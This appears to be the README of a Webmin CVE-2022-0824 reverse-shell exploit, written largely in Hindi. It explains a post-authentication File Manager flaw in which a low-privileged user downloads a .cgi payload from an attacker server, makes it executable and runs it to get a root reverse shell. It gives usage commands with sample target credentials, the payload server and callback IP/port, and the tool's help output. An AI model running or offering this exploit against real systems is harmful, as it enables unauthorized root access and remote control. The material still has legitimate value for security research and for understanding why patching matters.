
Webmin <=1.984 के लिए प्रमाणीकरण के बाद (post-authentication) रिवर्स शेल एक्सप्लॉइट, जो CVE-2022-0824 File Manager विशेषाधिकार वृद्धि (privilege escalation) का लाभ उठाता है। रूट एक्सेस प्राप्त करने के लिए CGI पेलोड डाउनलोड करता है और निष्पादित करता है।
Webmin 1.984 और उससे नीचे - File Manager विशेषाधिकार शोषण (CVE-2022-0824 और CVE-2022-0829)
कम विशेषाधिकार वाले Webmin उपयोगकर्ता जिनके पास File Manager मॉड्यूल प्रतिबंध कॉन्फ़िगर नहीं हैं, वे डिफ़ॉल्ट Authentic थीम का उपयोग करने पर रूट विशेषाधिकारों के साथ फ़ाइलों तक पहुँच सकते हैं। अतिरिक्त अविश्वसनीय Webmin उपयोगकर्ताओं वाले सभी सिस्टम को तुरंत अपग्रेड करना चाहिए। ध्यान दें कि Virtualmin सिस्टम इस बग से प्रभावित नहीं होते हैं, क्योंकि डोमेन स्वामी Webmin उपयोगकर्ताओं को कॉन्फ़िगर करने के तरीके के कारण।
स्रोत: https://www.webmin.com/security.html
यह शोषण File Manager में प्रमाणीकरण के बाद (post-auth) अनुचित अभिगम नियंत्रण (Improper Access Control) भेद्यता का लाभ उठाता है। यह शोषण किसी भी कम विशेषाधिकार वाले प्रमाणित हमलावर द्वारा किया जा सकता है। यह हमलावर-नियंत्रित सर्वर से दूरस्थ रूप से एक .cgi फ़ाइल डाउनलोड करेगा और इसकी अनुमति को विश्व-निष्पादन योग्य (world-executable) फ़ाइल में संशोधित करेगा। एक बार ऐसा हो जाने पर, यह .cgi फ़ाइल को निष्पादित करेगा ताकि हमलावर-नियंत्रित सर्वर के साथ रूट विशेषाधिकारों के साथ एक रिवर्स कनेक्शन स्थापित किया जा सके।
संदर्भ: https://huntr.dev/bounties/d0049a96-de90-4b1a-9111-94de1044f295/
$~ python3 Webmin-revshell.py -t [TARGET] -c [CREDENTIAL] -LS [PY3HTTP_SERVER] -L [CALLBACK_IP] -P [CALLBACK_PORT]
$~ python3 Webmin-revshell.py -t https://192.168.5.118:10000 -c user:user123 -LS 192.168.5.120:9090 -L 192.168.5.120 -P 4444
$~ python3 Webmin-revshell.py -h
usage: Webmin-revshell.py [-h] -t TARGET -c CREDENTIAL -LS PY3HTTP_SERVER -L CALLBACK_IP -P CALLBACK_PORT [-V]
Webmin CVE-2022-0824 Reverse Shell
optional arguments:
-h, --help show this help message and exit
-t TARGET, --target TARGET
Target full URL, https://www.webmin.local:10000
-c CREDENTIAL, --credential CREDENTIAL
Format, user:user123
-LS PY3HTTP_SERVER, --py3http_server PY3HTTP_SERVER
Http server for serving payload, ex 192.168.5.120:8080
-L CALLBACK_IP, --callback_ip CALLBACK_IP
Callback IP to receive revshell
-P CALLBACK_PORT, --callback_port CALLBACK_PORT
Callback port to receive revshell
-V, --version show program's version number and exit
target host: https://192.168.5.118:10000
attacker host: 192.168.5.120
- Webmin 1.984
- Ubuntu 18.04
- Kali 2021.3
The script is for security analysis and research only, hence I would not be liable if it is been used for illicit activities